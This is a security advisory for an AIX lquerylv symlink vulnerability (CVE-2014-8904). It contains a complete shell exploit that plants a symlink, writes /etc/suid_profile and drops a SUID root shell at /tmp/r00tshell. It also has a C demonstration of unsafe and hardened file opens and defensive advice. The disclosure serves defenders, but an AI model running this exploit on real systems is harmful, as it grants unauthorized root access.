SSD Advisory – AIX cmdlvm Vulnerability

SecuriTeam Secure Disclosure
SecuriTeam Secure Disclosure (SSD) provides the support you need to turn your experience uncovering security vulnerabilities into a highly paid career. SSD was designed by researchers for researchers and will give you the fast response and great support you need to make top dollar for your discoveries.
Introduction
AIX (Advanced Interactive eXecutive) is a series of proprietary Unix operating systems developed and sold by IBM for several of its computer platforms. Originally released for the IBM 6150 RISC workstation, AIX now supports or has supported a wide variety of hardware platforms, including the IBM RS/6000 series and later POWER and PowerPC-based systems, IBM System i, System/370 mainframes, PS/2 personal computers, and the Apple Network Server.
Vulnerability Details
Running the lquerylv command (installed SUID root as /usr/sbin/lquerylv) with its debug environment variable set (DBGCMD_LQUERYLV in the one-line summary; the exploit below sets it as _DBGCMD_LQUERYLV) makes it write a debug file to a fixed, predictable path under /tmp. lquerylv follows a symbolic link planted at that path, so an unprivileged local user can have root create an arbitrary file, with permissions inherited from the user's own umask. Turning that file-creation primitive into command execution, and so root privileges, is the second half of the exploit below.

Exploit

#!/bin/sh
#
# From file writing to command execution
# Tested on AIX 7.1
#
# Step 1: turn on lquerylv's debug mode. lquerylv is SUID root and, with this
# variable set, writes its debug file to the fixed path /tmp/DEBUGCMD.
export _DBGCMD_LQUERYLV=1
# Step 2: the file lquerylv creates inherits our umask, so make it world-writable.
umask 0000
# Step 3: plant a symlink at that path; lquerylv follows it and creates
# /etc/suid_profile as root, mode 0666.
ln -s /etc/suid_profile /tmp/DEBUGCMD
/usr/sbin/lquerylv
# Step 4: ksh reads /etc/suid_profile instead of ~/.profile whenever it starts
# with euid != ruid, i.e. under any SUID root program that spawns a shell.
# Fill it with commands that leave behind a SUID root copy of ksh.
cat << EOF >/etc/suid_profile
cp /bin/ksh /tmp/r00tshell
/usr/bin/syscall setreuid 0 0
chown root:system /tmp/r00tshell
chmod 6755 /tmp/r00tshell
EOF
# Step 5: trigger it with any SUID root binary that calls system() or execs ksh.
/opt/IBMinvscout/bin/invscoutClient_VPD_Survey # Any SUID root binaries with execve(), or system()
echo "[!] Remove the /etc/suid_profile!"
# Step 6: drop into the root shell.
/tmp/r00tshell
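The primitive the exploit rests on is a privileged process creating a file at a predictable path without refusing symbolic links. The C program below is an added example written for this page; it is not from the advisory, from IBM, or from lquerylv (whose source is not public). The functions debug_open_unsafe and debug_open_safe, the scratch directory and the file names are assumptions standing in for the real code. It re-creates the exploit's symlink-planting step inside a private directory, once against the unsafe open pattern and once against a hardened one using O_EXCL|O_NOFOLLOW plus an fstat check, and reports whether the link target got created.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed vulnerable pattern (an illustration of the bug class, not
 * lquerylv's actual source): open a fixed, attacker-predictable path for
 * writing. Without O_EXCL/O_NOFOLLOW, open() follows a symlink planted at
 * that path, so a root process creates or truncates whatever the link points
 * to, and the caller's umask decides the new file's permissions. */
int debug_open_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Hardened variant: never follow a symlink at the final component, never
 * reuse a pre-existing file, create it mode 0600, and confirm afterwards
 * that the descriptor is a regular file with one link, owned by us.
 * Returns the fd, or -1 with errno set. */
int debug_open_safe(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != geteuid() || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Private scratch directory (assumed layout): DEBUGCMD is a symlink to a
 * not-yet-existing file named suid_profile, mirroring the exploit's setup. */
static char *plant_symlink(char *dir, size_t dlen, char *lnk, size_t llen,
                           char *target, size_t tlen)
{
    strncpy(dir, "/tmp/dbgcmd.XXXXXX", dlen - 1);
    dir[dlen - 1] = '\0';
    if (!mkdtemp(dir))
        return NULL;
    snprintf(lnk, llen, "%s/DEBUGCMD", dir);
    snprintf(target, tlen, "%s/suid_profile", dir);
    if (symlink(target, lnk) < 0) {
        rmdir(dir);
        return NULL;
    }
    return dir;
}

static void cleanup(const char *dir, const char *lnk, const char *target)
{
    unlink(target);
    unlink(lnk);
    rmdir(dir);
}

/* Returns 1 if the unsafe open, called on the symlink, created the link
 * target: the arbitrary-file-creation primitive the advisory relies on. */
int unsafe_follows_symlink(void)
{
    char dir[64], lnk[128], target[128];
    if (!plant_symlink(dir, sizeof dir, lnk, sizeof lnk, target, sizeof target))
        return -1;
    int fd = debug_open_unsafe(lnk);
    int created = (fd >= 0) && (access(target, F_OK) == 0);
    if (fd >= 0)
        close(fd);
    cleanup(dir, lnk, target);
    return created;
}

/* Returns 1 if the hardened open refuses the same symlink (EEXIST from
 * O_EXCL or ELOOP from O_NOFOLLOW) and leaves the target uncreated. */
int safe_refuses_symlink(void)
{
    char dir[64], lnk[128], target[128];
    if (!plant_symlink(dir, sizeof dir, lnk, sizeof lnk, target, sizeof target))
        return -1;
    int fd = debug_open_safe(lnk);
    int refused = (fd < 0) && (errno == EEXIST || errno == ELOOP) &&
                  (access(target, F_OK) != 0);
    if (fd >= 0)
        close(fd);
    cleanup(dir, lnk, target);
    return refused;
}

int main(void)
{
    printf("unsafe open follows symlink: %d\n", unsafe_follows_symlink());
    printf("safe open refuses symlink:   %d\n", safe_refuses_symlink());
    return 0;
}
```

The flags used are POSIX.1-2008 and the program was checked on Linux; whether a given AIX level honours O_NOFOLLOW is not something this page establishes. Two caveats for the defender: a SUID root program should not take a debug switch from the environment at all, and should write any debug output under a root-owned directory (mkstemp in a private directory rather than a fixed name in /tmp); and on the ksh side, /etc/suid_profile is executed by every SUID root program that spawns ksh, so it must exist only if intended, owned by root and writable by nobody else.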

Vendor Response
IBM has released an advisory and a patch for AIX servers: AIX cmdlvm vulnerability.
CVE
One CVE entry has been released for this vulnerability: CVE-2014-8904
